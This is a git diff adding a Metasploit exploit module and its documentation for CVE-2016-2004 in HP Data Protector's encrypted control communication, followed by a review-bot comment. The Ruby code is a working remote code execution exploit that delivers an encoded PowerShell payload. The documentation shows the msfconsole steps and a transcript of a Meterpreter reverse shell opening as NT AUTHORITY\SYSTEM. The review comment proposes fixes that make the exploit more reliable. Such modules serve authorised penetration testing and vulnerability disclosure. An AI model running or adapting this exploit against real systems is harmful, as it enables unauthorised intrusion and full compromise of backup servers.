diff --git a/documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md b/documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md
new file mode 100644
index 0000000000..a72b649bff
--- /dev/null
+++ b/documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md
@@ -0,0 +1,75 @@
+HP Data Protector is an automated backup and recovery software for single-server to enterprise
+environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
+and Linux operating systems.
+
+While the server is using Encrypted Control Communication, HP Data Protector allows a remote
+attacker to gain access without authentication, and gain arbitrary code execution under the
+context of SYSTEM.
+
+
+## Vulnerable Application
+
+HP Data Protector versions 7, 8, and 9 are known to be affected.
+
+hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
+
+## Verification Steps
+
+**Installing HP Data Protector**
+
+Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
+against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).
+
+After setting up the domain controller, double-click on the HP Data Protector installer, and you
+should see this screen:
+
+![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)
+
+Click on **Install Data Protector**. And then the installer should ask you which installation type:
+
+![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)
+
+Make sure to select **Cell Manager**, and click **Next**. Use all default settings.
+
+**Enabling Encrypted Communication**
+
+After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
+Data Protector GUI:
+
+![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)
+
+Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the
+right, click on that.
+
+![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)
+
+Under the Connection tab, there should be an **Encrypted control communication** checkbox, make
+sure that is checked. And then click **Apply**
+
+**Using hp_dataprotector_encrypted_comms**
+
+After the encrypted communication is enabled, you are ready to use
+hp_dataprotector_encrypted_comms. Here is what you do:
+
+1. Start msfconsole
+2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
+3. Do: ```set RHOST [IP ADDRESS]```
+4. Do: ```set PAYLOAD [PAYLOAD NAME]```
+5. Set other options as needed
+6. Do: ```exploit```, and you should receive a session like the following:
+
+```
+msf exploit(hp_dataprotector_encrypted_comms) > run
+
+[*] Started reverse TCP handler on 172.16.23.1:4444
+[*] 172.16.23.173:5555 - Initiating connection
+[*] 172.16.23.173:5555 - Establishing encrypted channel
+[*] 172.16.23.173:5555 - Sending payload
+[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
+[*] Sending stage (957999 bytes) to 172.16.23.173
+[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
+
diff --git a/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb b/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb
new file mode 100644
index 0000000000..64258c69ac
--- /dev/null
+++ b/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+require 'openssl'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "HP Data Protector Encrypted Communication Remote Command Execution",
+      'Description'    => %q{
+        This module exploits a well known remote code execution exploit after establishing encrypted
+        control communications with a Data Protector agent. This allows exploitation of Data
+        Protector agents that have been configured to only use encrypted control communications.
+
+        This exploit works by executing the payload with Microsoft PowerShell so will only work
+        against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows
+        Server 2008 R2.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Jon Barg', # Reported vuln (originally discovery?) credited by HP
+          'Ian Lovering' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2016-2004' ],
+          [ 'URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars'      => "\x00"
+        },
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 30,
+          'RPORT'    => 5555
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 18 2016",
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    # For the check command
+    connect
+    sock.put(rand_text_alpha_upper(64))
+    response = sock.get_once(-1)
+    disconnect
+
+    if response.nil?
+      return Exploit::CheckCode::Safe
+    end
+
+    service_version = Rex::Text.to_ascii(response).chop.chomp
+
+    if service_version =~ /HP Data Protector/
+      vprint_status(service_version)
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+
+  end
+
+  def generate_dp_payload
+    command = cmd_psh_payload(
+      payload.encoded,
+      payload_instance.arch.first,
+      { remove_comspec: true, encode_final_payload: true })
+
+    payload =
+      "\x32\x00\x01\x01\x01\x01\x01\x01" +
+      "\x00\x01\x00\x01\x00\x01\x00\x01" +
+      "\x01\x00\x20\x32\x38\x00\x5c\x70" +
+      "\x65\x72\x6c\x2e\x65\x78\x65\x00" +
+      "\x20\x2d\x65\x73\x79\x73\x74\x65" +
+      "\x6d('#{command}')\x00"
+
+    payload_length = [payload.length].pack('N')
+
+    return payload_length + payload
+  end
+
+  def exploit
+    # Main function
+    encryption_init_data =
+      "\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
+      "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
+      "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
+      "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
+      "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
+
+    print_status("Initiating connection")
+
+    # Open connection
+    connect
+
+    # Send init data
+    sock.put(encryption_init_data)
+    begin
+      buf = sock.get_once
+    rescue ::EOFError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    end
+
+    print_status("Establishing encrypted channel")
+
+    # Create TLS / SSL context
+    sock.extend(Rex::Socket::SslTcp)
+    sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
+    sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
+
+    sock.sslctx.options = OpenSSL::SSL::OP_ALL
+
+    # Enable all ciphers as older versions of Data Protector only use
+    # some not enabled by default
+    sock.sslctx.ciphers = "ALL"
+
+    # Enable TLS / SSL
+    sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
+    sock.sslsock.connect
+
+    print_status("Sending payload")
+
+    # Send payload
+    sock.put(generate_dp_payload(), {timeout: 5})
+
+    # Close socket
+    disconnect
+
+    print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
+  end
+
+end
+
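Review bot: The `rescue ::EOFError` around `buf = sock.get_once` in `exploit` only logs and then falls through, so if the agent closes the connection after the init blob (e.g. encrypted control communication is not actually enabled, or the port belongs to something else) the module goes on to call `sock.sslsock.connect` on a dead socket and the operator sees an opaque OpenSSL backtrace instead of a clear failure; `buf` is also never read. I would replace the rescue body with `fail_with(Failure::Unreachable, 'Agent closed the connection before the encrypted channel could be negotiated')` and drop the unused assignment. Separately, `'Privileged' => false` in `initialize` contradicts the accompanying documentation, which shows the resulting session as `NT AUTHORITY\SYSTEM`, so the metadata should say `true`. In `generate_dp_payload` the local `payload` shadows the `payload` method called two statements earlier and only works because the assignment comes after that call; renaming it (e.g. `dp_message`) and sizing the length prefix with `[dp_message.bytesize].pack('N')` avoids the shadowing and any future character/byte mismatch in the wire length.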